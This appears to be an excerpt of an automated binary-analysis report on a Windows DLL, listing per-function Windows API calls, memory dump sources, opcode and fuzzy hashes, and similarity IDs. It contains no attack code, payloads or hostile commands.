                                                                                                                                                                                                                    • Instruction ID: adbafdfbb91bb59fa3c901d3c3c301af0e2c2c743ed5a438f62450df9ecbe81c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e094e696e2a90ea59a62d559c571e2189a1e510ebe1187d4e4636efd1c35f96a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A74119B1A0874DABDB10CF68D844B9EBBF9EF85715F10422AE615D7680DB35E410CFA8
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6F205BD2
                                                                                                                                                                                                                      • Part of subcall function 6F205BC0: CreateMenu.USER32 ref: 6F205C10
                                                                                                                                                                                                                      • Part of subcall function 6F205BC0: CreateMenu.USER32 ref: 6F205C82
                                                                                                                                                                                                                      • Part of subcall function 6F205BC0: InitNetworkAddressControl.SHELL32 ref: 6F205D50
                                                                                                                                                                                                                    • GetOEMCP.KERNEL32(?,?,00000001,xt), ref: 6F205D77
                                                                                                                                                                                                                    • GetOpenClipboardWindow.USER32(?,00000001,xt), ref: 6F205D85
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateMenu$AddressClipboardControlCurrentInitNetworkOpenThreadWindow
                                                                                                                                                                                                                    • String ID: xt
                                                                                                                                                                                                                    • API String ID: 3659090326-2466895102
                                                                                                                                                                                                                    • Opcode ID: 17435e65236e7864d6b22b39ca3bcceb7dbac30f921b0c50aaf5f356fa354b85
                                                                                                                                                                                                                    • Instruction ID: 3e17c9644c87e7e6cfec911e5a5610885e4c5691b54585a37119021e8f5d3760
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 17435e65236e7864d6b22b39ca3bcceb7dbac30f921b0c50aaf5f356fa354b85
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1251B4B3C20F5D8ADB13DF7884661AFB77AAFAB2D5B104317E405BA415EB2094D28E50
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,6F217308,00000000), ref: 6F217182
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 6F217189
                                                                                                                                                                                                                      • Part of subcall function 6F217254: IsProcessorFeaturePresent.KERNEL32(0000000C,6F217170,00000000,?,6F217308,00000000), ref: 6F217256
                                                                                                                                                                                                                    • InterlockedPopEntrySList.KERNEL32(00000000,00000000,?,6F217308,00000000), ref: 6F217199
                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 6F2171C0
                                                                                                                                                                                                                    • RaiseException.KERNEL32(C0000017,00000000,00000000,00000000), ref: 6F2171D4
                                                                                                                                                                                                                    • InterlockedPopEntrySList.KERNEL32(00000000), ref: 6F2171E7
                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6F2171FA
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AllocEntryHeapInterlockedListVirtual$ExceptionFeatureFreePresentProcessProcessorRaise
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2460949444-0
                                                                                                                                                                                                                    • Opcode ID: fcff927fae38ac0b6163695a832b6e9d1832a0e97f3b30c448c49aeed2b5bec2
                                                                                                                                                                                                                    • Instruction ID: 995221ee1426f568f31d79987b93efd67b7f4cb8bbed4420b1901f96d852a7d1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fcff927fae38ac0b6163695a832b6e9d1832a0e97f3b30c448c49aeed2b5bec2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AC11027274891567E7215668CC4CF5633EDDB87B51F110410FB40F6644DA50DC25CF79
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 6F22860C: GetLastError.KERNEL32(00000000,00000000,6F21B6A7,00000000,00000000,?,6F22CF3F,00000000,00000000,?,03496498,00000000), ref: 6F228610
                                                                                                                                                                                                                      • Part of subcall function 6F22860C: SetLastError.KERNEL32(00000000,00000006,000000FF,?,6F22CF3F,00000000,00000000,?,03496498,00000000), ref: 6F2286B4
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F22A45F
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F22A478
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F22A4AA
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F22A4B3
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F22A4BF
                                                                                                                                                                                                                    • GetStartupInfoW.KERNEL32(?), ref: 6F22A51C
                                                                                                                                                                                                                    • GetFileType.KERNEL32(?,?,?,00000004), ref: 6F22A586
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _free$ErrorLast$FileInfoStartupType
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3484604699-0
                                                                                                                                                                                                                    • Opcode ID: 3ee58aa283807b257f174e7f04078bb8305065c1c84b8955b003b4557e4e4264
                                                                                                                                                                                                                    • Instruction ID: 5237c036a91079b64a966fca6a9ab9969da154df19d58274c434d832c6eeac9f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ee58aa283807b257f174e7f04078bb8305065c1c84b8955b003b4557e4e4264
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F2D16D71A0521A9FDB24CF28C884B9DB7F5FF49314F1046AAE849A7790D731AE90CF80
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6F24D2E0,A9775A74), ref: 6F20FE3D
                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(?,00000104), ref: 6F20FEC0
                                                                                                                                                                                                                    • LoadTypeLib.OLEAUT32(?,00000000), ref: 6F20FEE7
                                                                                                                                                                                                                    • LoadRegTypeLib.OLEAUT32(6F245488,00000000,00000000,?,00000000), ref: 6F20FF02
                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6F24D2FC), ref: 6F2100C5
                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6F24D2FC), ref: 6F2100DB
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CriticalSection$EnterLoadType$FileLeaveModuleName
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1976781235-0
                                                                                                                                                                                                                    • Opcode ID: b9e80ec88132bc9b5fd0c0942ace2a24cb23966dc05d19d945964f2f0ba1cca8
                                                                                                                                                                                                                    • Instruction ID: af8e9efb0457e69d07d5618ce2cf2d974c3db600b2dfc00d3008afef73f7c5fd
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b9e80ec88132bc9b5fd0c0942ace2a24cb23966dc05d19d945964f2f0ba1cca8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DEB18A75905259DFDB20DF64C88CB9ABBF5FF4A315F104099E808AB240DB75EA54CF60
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                                                                                                    • Opcode ID: fa1959e19c4ffec020d3d517d3c57df3f8bfb2709fa9eaf7e17e505f6fe86228
                                                                                                                                                                                                                    • Instruction ID: 59ebb13fc5ffcd6bfa53d3649181c6ef60edb7fa858e8568b775d9dbfeaaf805
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fa1959e19c4ffec020d3d517d3c57df3f8bfb2709fa9eaf7e17e505f6fe86228
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A86150F2D0421DAFDB10CFA8C841B9AB7F5EF45710F14456AE954EB681E770AA418FA0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000060), ref: 6F20DCDD
                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002), ref: 6F20DCEF
                                                                                                                                                                                                                    • FindResourceW.KERNEL32(00000000,?,?), ref: 6F20DD16
                                                                                                                                                                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 6F20DD2E
                                                                                                                                                                                                                      • Part of subcall function 6F20D2E0: GetLastError.KERNEL32(8007000E,80004005), ref: 6F20D2E0
                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,00000000,?), ref: 6F20DE1F
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: LibraryLoad$Resource$ErrorFindFreeLast
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 328770362-0
                                                                                                                                                                                                                    • Opcode ID: 0d4cdd25fb5db8b97e4a635bc25333750d01432dc0071ab1374c770e5bb6d8f6
                                                                                                                                                                                                                    • Instruction ID: eeab91acf493dfbac8f3a740433c3a36449b7de139f8cf599e1503bfc7b403ae
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0d4cdd25fb5db8b97e4a635bc25333750d01432dc0071ab1374c770e5bb6d8f6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C51D7B3A0521D9BCB21DF64C944B9E77BAEF89714F900169F504A7281DF309A50CF59
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetConsoleCP.KERNEL32(00000000,00000001,00000020,?,?,?,?,?,?,?,6F22E48E,00000008,00000001,00000020,0000002C,?), ref: 6F22DD44
                                                                                                                                                                                                                    • __fassign.LIBCMT ref: 6F22DDC3
                                                                                                                                                                                                                    • __fassign.LIBCMT ref: 6F22DDE2
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000001,00000001,00000020,00000005,00000000,00000000), ref: 6F22DE0F
                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,00000020,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,6F22E48E), ref: 6F22DE2F
                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,00000008,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,6F22E48E), ref: 6F22DE69
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1324828854-0
                                                                                                                                                                                                                    • Opcode ID: 53e0e747965efe3296b1e1f6c7b302d91612f7e4bd4a4206e2e345484d3c9852
                                                                                                                                                                                                                    • Instruction ID: eead99a77fd101400c5377e2d9aa402d05b86f3f235f93dbd4f7ac738682606e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 53e0e747965efe3296b1e1f6c7b302d91612f7e4bd4a4206e2e345484d3c9852
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A95193B1E00649AFDB10CFA8C885AEEBBF9FF0A310F14415AE555E7251D730A955CF60
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 6F218187
                                                                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 6F21818F
                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 6F218218
                                                                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 6F218243
                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 6F218298
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                    • Opcode ID: a4bd9f277903587f34b1e512a562081394f82f1a00cf056e688ab1548d60ca93
                                                                                                                                                                                                                    • Instruction ID: 2e0334bcdc517f4d880eca3f2ec30dba151ec1fb78998d1a3eac59c979a9588d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a4bd9f277903587f34b1e512a562081394f82f1a00cf056e688ab1548d60ca93
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6141BF35E0864D9BCF01CF68C8C4ADE7BF5AF05329F108156EA299B391C735AA15CF94
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,6F20AB4D,6F20AB4C,00000000,00000000,00000000,00000000,A9775A74,00000000,?,00000000,6F20AB4D,?,?), ref: 6F2174B3
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,6F20AB4D,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 6F2174EA
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharMultiWide
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 626452242-0
                                                                                                                                                                                                                    • Opcode ID: 3ac966866b12ac57ee6679ca54386b33910ee623b434f8b197f3e36e205e72d9
                                                                                                                                                                                                                    • Instruction ID: f2b5f75233d2a5329347e72ff18b7accaf7186a113ee347801c27beb404b9906
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ac966866b12ac57ee6679ca54386b33910ee623b434f8b197f3e36e205e72d9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F310AB2A08349ABD710CB65DC05BAB77F8EB85B25F104169FE05EA6C0D771A510CEA8
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CallWindowProcW.USER32(?,?,?,00000024,00000000), ref: 6F2122F0
                                                                                                                                                                                                                    • GetWindowLongW.USER32 ref: 6F212304
                                                                                                                                                                                                                    • CallWindowProcW.USER32(?,?,00000082,00000024,00000000), ref: 6F21231A
                                                                                                                                                                                                                    • GetWindowLongW.USER32 ref: 6F212333
                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000FC,?), ref: 6F212342
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$Long$CallProc
                                                                                                                                                                                                                    • String ID: $
                                                                                                                                                                                                                    • API String ID: 513923721-3993045852
                                                                                                                                                                                                                    • Opcode ID: 2670f0bac4c8b857af1928316a3b0a4dd4f9a47f73ce1540746033e36f97c6d4
                                                                                                                                                                                                                    • Instruction ID: 6ab668121dbdf2b3b6ac7f3729d17843ad2f62bf30b44de2910faaf40f26d668
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2670f0bac4c8b857af1928316a3b0a4dd4f9a47f73ce1540746033e36f97c6d4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B74139B1904609AFDB20CF99C884A9FBBF5FF49310F10865DE956A76A0D731A914CF90
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(Advapi32.dll,A9775A74), ref: 6F20D504
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 6F20D51B
                                                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,00000000,A9775A74), ref: 6F20D550
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 6F20D563
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressCloseHandleModuleOpenProc
                                                                                                                                                                                                                    • String ID: Advapi32.dll$RegOpenKeyTransactedW
                                                                                                                                                                                                                    • API String ID: 823179699-3913318428
                                                                                                                                                                                                                    • Opcode ID: 80c947b9a024cba473283ea1badf3492dc12f2c30409ea9ceb364778e15c13a7
                                                                                                                                                                                                                    • Instruction ID: a935767db292d1000718dbe8439f0ded5d6bac909aedc2f1afee0d923c4b946f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 80c947b9a024cba473283ea1badf3492dc12f2c30409ea9ceb364778e15c13a7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F431B4B2A0460AAFDB10DF59C844BAABBBAFB45315F504129EC15A7280DB70E910CEA0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000), ref: 6F207B7E
                                                                                                                                                                                                                    • SysAllocStringLen.OLEAUT32(00000000,-00000001), ref: 6F207B8C
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000), ref: 6F207BA1
                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 6F207BAC
                                                                                                                                                                                                                    • VarBstrCmp.OLEAUT32(?,00000000,00000400,00000000), ref: 6F207BCB
                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 6F207BD8
                                                                                                                                                                                                                    • SysFreeString.OLEAUT32 ref: 6F207C02
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: String$Free$ByteCharMultiWide$AllocBstr
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1801994256-0
                                                                                                                                                                                                                    • Opcode ID: 63c233bd330f1d39cf4a63096837c82675e07446e0caa775a34e55639f166fe2
                                                                                                                                                                                                                    • Instruction ID: 9a4f209552f1356d1c030f73993e2705dc23c23754e99ddbb36cbcd08ec46a2b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 63c233bd330f1d39cf4a63096837c82675e07446e0caa775a34e55639f166fe2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 69114C7364471EBBDB2017148C5DFCA7B29DB43B31F200345FA21B66C4CAB0A820CDA0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                    • API String ID: 0-537541572
                                                                                                                                                                                                                    • Opcode ID: 397555453127c3d17c970b45381af9000feab37ebdb15527d3afbd0bfedde433
                                                                                                                                                                                                                    • Instruction ID: e18856d2058f5f3151b2d40b40ad18bf3fb24503fb36378e1e1529541042eebc
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 397555453127c3d17c970b45381af9000feab37ebdb15527d3afbd0bfedde433
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5321DBB29C962EABDB2156388DC4E4A77E9DF06F71F100A11ED15AB280DB74ED10CDE1
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 6F232DF2: _free.LIBCMT ref: 6F232E17
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F2330F6
                                                                                                                                                                                                                      • Part of subcall function 6F227F62: HeapFree.KERNEL32(00000000,00000000,?,6F232E1C,?,00000000,?,00000000,?,6F2330C1,?,00000007,?,?,6F2310B4,?), ref: 6F227F78
                                                                                                                                                                                                                      • Part of subcall function 6F227F62: GetLastError.KERNEL32(?,?,6F232E1C,?,00000000,?,00000000,?,6F2330C1,?,00000007,?,?,6F2310B4,?,?), ref: 6F227F8A
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F233101
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F23310C
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F233160
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F23316B
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F233176
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F233181
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                    • Opcode ID: 4ae2c02a372ded23fb346e1d660c87c497e2450403bcf5bb002bd5bdac4a6360
